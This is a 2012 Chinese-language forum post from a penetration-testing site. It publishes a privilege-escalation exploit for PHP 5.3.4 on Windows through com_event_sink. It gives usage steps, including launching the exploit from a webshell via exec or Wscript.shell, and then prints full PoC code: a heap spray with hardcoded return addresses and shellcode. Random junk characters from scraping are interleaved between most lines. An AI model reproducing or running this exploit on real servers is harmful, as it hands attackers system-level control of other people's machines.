中国网络渗透测试联盟
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 21:08
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
5 E6 T+ K) l3 L' i5 J
`2 Y9 G& d u! m% P9 [
测试方法如下:cmd /c x:\php\php.exe x:\test.php
! h) f3 S" _" T! Z$ n. n/ `, K
3 v) H8 u- _% o5 D6 I8 ?8 Y7 L2 S
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
6 e/ S6 Y0 S7 T( D9 `7 Z1 O
这里是两个测试的截图:
7 _* \& V" w9 o7 _
: I2 G1 N* ]' @5 m6 }
5 R% }0 k4 |/ }0 O
( h+ h' B d+ x% o: P9 n' k4 \' {3 m! ^
& g$ ]: x" l4 Q3 r$ t8 _( C! q" d( z
! b9 \+ {$ U; R! p
成功利用此漏洞的攻击者将获得系统的最高权限
% a6 n s$ A* I4 H. q1 s
; s) T& }% |0 ?/ {+ Y! z/ G: Q; i
$ w5 l, T0 e" o7 a9 l
3 P! n: L* X2 r
: b* Q1 r* x$ L4 r4 o
$ X2 l% ]- H. `
关于漏洞分析稍后附上。一下是PoC代码:
- b0 T: p% i; h: a( p% x. P. |$ \
) z+ m/ A- v$ p1 C& I
<?php
, }& K' K1 j2 r$ |' `/ `
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
- V" s1 {- ~" N0 j8 y4 M' G
//$eip ="\x44\x43\x42\x41";
" |# W. Z- m `4 m! H
$eip= "\x4b\xe8\x57\x78";
: a t' p# w# u; {
$eax ="\x80\x01\x8d\x04";
s1 Z( s0 ]; Y; A! N! \, }% e* K
$deodrant="";
- \: R; \) c/ Y9 m. y, D, Y
$axespray = str_repeat($eip.$eax,0x80);
, g$ n4 i' b1 G* L0 ^* Q5 @
//048d0190
6 D# V6 i4 `# i2 h3 d& Y
echo strlen($axespray);
% O- W# \) t1 `) f/ Y
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
; d" M$ E2 k& u7 t! q) b, v
echo "Silic Group Hacker Army - BlackBap.Org";
+ c5 i4 M/ {; z" o
//19200 ==4B32 4b00
# _3 T. _) _" I y5 K7 E: a/ u
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
+ ^7 N$ z% O: V" ?4 y
$terminate = "T";
& I3 S9 G4 d( W: z/ F. g
$u[] =$deodrant;
% Y% ?6 j2 J* s
$r[] =$deodrant.$terminate;
* O( y0 \2 U1 B) W! a$ R% {
$a[] =$deodrant.$terminate;
$ i& Z" E9 X6 J
$s[] =$deodrant.$terminate;
# ^! h9 L* O! {9 W8 L
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
4 e/ q! G+ v7 u" T1 A5 J3 B
$vVar = new VARIANT(0x048d0000+180);
* a) w! h' G- A
//弹窗代码(Shellcode)
* E: N2 b" \ A/ a) c# n p
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
: d: L8 z( ?% Q; I
$var2 = new VARIANT(0x41414242);
: b5 e: H# J8 @+ k, a2 W
com_event_sink($vVar,$var2,$buffer);
?1 {' ~! u$ O. J
?>
! `4 x' X2 K3 X2 \" [* w! F
[attach]113[/attach][attach]114[/attach]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2